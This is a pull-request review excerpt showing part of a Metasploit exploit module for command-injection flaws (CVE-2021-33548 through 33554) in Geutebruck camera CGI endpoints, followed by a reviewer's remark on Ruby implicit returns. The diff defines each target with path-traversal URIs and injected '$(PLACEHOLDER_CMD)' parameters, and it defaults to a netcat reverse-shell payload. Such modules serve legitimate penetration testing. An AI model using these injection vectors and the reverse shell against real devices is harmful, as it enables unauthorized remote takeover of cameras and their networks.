modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb

```diff
@@ -0,0 +1,186 @@
+                'country' => Rex::Text.rand_text_alphanumeric(2..2),
+                'state' => '$(PLACEHOLDER_CMD)',
+                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
+                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
+                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
+                'days' => Rex::Text.rand_text_numeric(2..4),
+                'type' => Rex::Text.rand_text_numeric(2..4)
+              },
+              'uri' => '/../uapi-cgi/certmngr.cgi'
+            }
+          ],
+          [
+            'CVE-2021-33548 - factory.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
+              'uri' => '/../uapi-cgi/factory.cgi'
+            }
+          ],
+          [
+            'CVE-2021-33550 - language.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
+              'uri' => '/../uapi-cgi/language.cgi'
+            }
+          ],
+          [
+            'CVE-2021-33551 - oem.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => {
+                'action' => 'set',
+                'enable' => 'yes',
+                'environment.lang' => '$(PLACEHOLDER_CMD)'
+              },
+              'uri' => '/../uapi-cgi/oem.cgi'
+            }
+          ],
+          [
+            'CVE-2021-33552 - simple_reclistjs.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => {
+                'action' => 'get',
+                'timekey' => Rex::Text.rand_text_numeric(2..4),
+                'date' => '$(PLACEHOLDER_CMD)'
+              },
+              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
+            }
+          ],
+          [
+            'CVE-2021-33553 - testcmd.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
+              'uri' => '/../uapi-cgi/testcmd.cgi'
+            }
+          ],
+          [
+            'CVE-2021-33554 - tmpapp.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
+              'uri' => '/../uapi-cgi/tmpapp.cgi'
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+        },
+        'Notes' => {
+          'Stability' => ['CRASH_SAFE'],
+          'Reliability' => ['REPEATABLE_SESSION'],
+          'SideEffects' => ['ARTIFACTS_ON_DISK']
+        }
+      )
+    )
+  end
+
+  def firmware
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/brand.xml'
+    )
+    unless res
+      vprint_error('Connection failed')
+      return CheckCode::Unknown
+    end
+
+    res_xml = res.get_xml_document
+    @version = res_xml.at('//firmware').text
+    return true
```

Comment:
```suggestion
    @version = res_xml.at('//firmware').text
```

We did talk about implicit returns here. This isn't needed. Furthermore Ruby will use the last assignment as the return value if no return value is specified.